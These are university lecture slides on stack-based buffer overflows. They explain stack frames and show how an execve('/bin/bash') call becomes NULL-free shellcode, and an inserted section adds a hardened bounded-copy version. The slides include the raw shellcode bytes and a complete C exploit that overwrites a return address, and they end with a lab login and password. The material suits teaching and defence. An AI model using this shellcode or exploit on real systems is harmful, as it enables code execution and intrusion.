Stack-based buffer overflows
Yves Younan
DistriNet, Department of Computer Science, Katholieke Universiteit Leuven, Belgium
Yves.Younan@cs.kuleuven.ac.be
Overview
• Introduction
• Buffer overflows
• Stack-based buffer overflows
• Shellcode
• Code injection
• Conclusion
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Introduction
• Buffer overflows: writes outside the boundaries of an array
• Can be used to overwrite adjacent memory
• The stack contains control-flow related data, e.g. return addresses
• Overwriting this data allows an attacker to execute new or existing code
Buffer overflows (on IA32)

    int main(int argc, char **argv) {
        int a;
        char buf[100];
        strcpy(buf, argv[1]);
    }

• int a is allocated on the stack: 4 bytes
• buf has memory allocated for 100 chars: 100 bytes
• The string in argv[1] can be longer than that, allowing an attacker to overwrite a in this example
Buffer overflow on IA32 (stack layout)

    High addr    int a
                 char buf[100]
    Low addr

buf lies below a on the stack, so a copy that runs past the end of buf writes upward into a.
Stack-based buffer overflows

    void f1(char *a) {
        char buffer[100];
        strcpy(buffer, a);
    }

    void f0(char *b) {
        f1(b);
    }
Stack-based buffer overflows (stack layout while f0 has called f1)

    High addr
    +--------------------------+
    | ...                      |
    | Return address f0        |  \
    | Saved frame pointer f0   |   } stack frame f0 (f0 calls f1)
    | Local variables f0       |  /
    | ...                      |
    | Arguments of f1          |
    +--------------------------+
    | Return address f1        |  <-- overwritten by the overflow
    | ...                      |
    | Saved frame pointer f1   |  \
    | buffer[]                 |   } stack frame f1
    | (injected code)          |  /
    +--------------------------+
    Low addr

The strcpy in f1 fills buffer[] upward, through the saved frame pointer and into f1's return address; the overwritten return address points back into buffer[], where the injected code was placed.
Shellcode
• Code to execute once the return address has been overwritten
• Usually inserted into the buffer that is used to overflow
• Some subtleties: a NULL byte will terminate a strcpy, \n will terminate gets
Example code

    #include <unistd.h>

    int main() {
        char *argv[2];
        argv[0] = "/bin/bash";
        argv[1] = 0;
        execve(argv[0], argv, 0);
    }
Example transformed to assembly

    .type main,@function
    main:
        push $0x68          # Place "h" (followed by three NUL bytes) on the stack.
        push $0x7361622f    # Place sab/ on the stack (bytes "/bas" in memory).
        push $0x6e69622f    # Place nib/ on the stack (bytes "/bin" in memory).
        mov %esp,%ebx       # Copy the pointer to /bin/bash to ebx.
        xor %edx,%edx       # Empty edx.
        push %edx           # Place a NULL on the stack to terminate the argv.
        push %ebx           # Place the pointer to /bin/bash on the stack.
        mov %esp,%ecx       # Copy the pointer to the pointer to /bin/bash into ecx.
        mov $0xb,%eax       # Let the syscall know we want execve (system call 11).
        int $0x80           # Do the system call.
Shellcode (the bytes of main as shown by gdb)

    (gdb) x/27b main
    0x8048308 <main>:     0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68
    0x8048310 <main+8>:   0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2
    0x8048318 <main+16>:  0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00
    0x8048320 <main+24>:  0x00 0xcd 0x80

The mov $0xb,%eax encodes as b8 0b 00 00 00: the three NULL bytes would terminate a strcpy before the int $0x80 is copied.
Shellcode (NULL-free version)

    .globl main
    .type main,@function
    main:
        push $0x68
        push $0x7361622f
        push $0x6e69622f
        mov %esp,%ebx
        xor %edx,%edx
        push %edx
        push %ebx
        mov %esp,%ecx
        xor %eax,%eax       # set %eax to 0
        mov $0xb,%al        # copy 0xb into %al (least significant byte of %eax)
        int $0x80
Sample vulnerable program

    void function(int a, char *b) {
        char string1[10];
        char string2[50];
        strcpy(string2, b);
    }

    int main(int argc, char **argv) {
        function(1, argv[1]);
    }
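A hardened counterpart to the vulnerable function above (and to the main() on the earlier "Buffer overflows (on IA32)" slide), added here as example code rather than taken from the lecture: bounded_copy, function_safe and try_length are hypothetical names, and the copy is bounded by the destination size so an over-long argument is refused instead of running past string2 into the saved frame pointer and return address.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define STRING2_SIZE 50   /* same destination size as the slide's string2[50] */

/* Copy src into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if the copy would run past dst. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')   /* never read further than could fit */
        len++;
    if (len == dst_size)
        return -1;                                /* no room for the terminator: refuse */
    memcpy(dst, src, len + 1);                    /* includes the '\0' */
    return 0;
}

/* Same shape as the slide's function(int a, char *b), but the unbounded
 * strcpy is replaced by the checked copy. Returns the stored length or -1. */
int function_safe(int a, const char *b)
{
    char string1[10];
    char string2[STRING2_SIZE];
    (void)a; (void)string1;                       /* kept from the slide, unused */
    if (bounded_copy(string2, sizeof string2, b) != 0) {
        fprintf(stderr, "argument too long for %zu-byte buffer, rejected\n",
                sizeof string2);
        return -1;
    }
    return (int)strlen(string2);
}

/* Helper (hypothetical): call function_safe with an argument of n repeated
 * 'A' bytes, e.g. 72 bytes, well past the 49 that string2 can hold. */
int try_length(size_t n)
{
    char arg[256];
    if (n >= sizeof arg)
        return -2;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return function_safe(1, arg);
}

int main(int argc, char **argv)
{
    if (argc < 2)
        return 1;
    return function_safe(1, argv[1]) < 0 ? 1 : 0;
}
```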
Sample exploit

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[] =
        "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89"
        "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";

    #define ADDR 0xbffffe2c

    int main() {
        char overflow[72];
        char *argv[3] = { "./bufferoverflow", overflow, NULL };
        memset(overflow, '\x90', 72);                    // fill with NOPs
        *(long *) &overflow[68] = ADDR;                  // replace ret. addr.
        memcpy(overflow, shellcode, strlen(shellcode));
        execve(argv[0], argv, 0);                        // exec program
    }
Conclusion
• Follow "Gera's Insecure Programming by example":
  http://community.corest.com/~gera/InsecureProgramming/
• Login/pass for the computers: cstudy/distrinet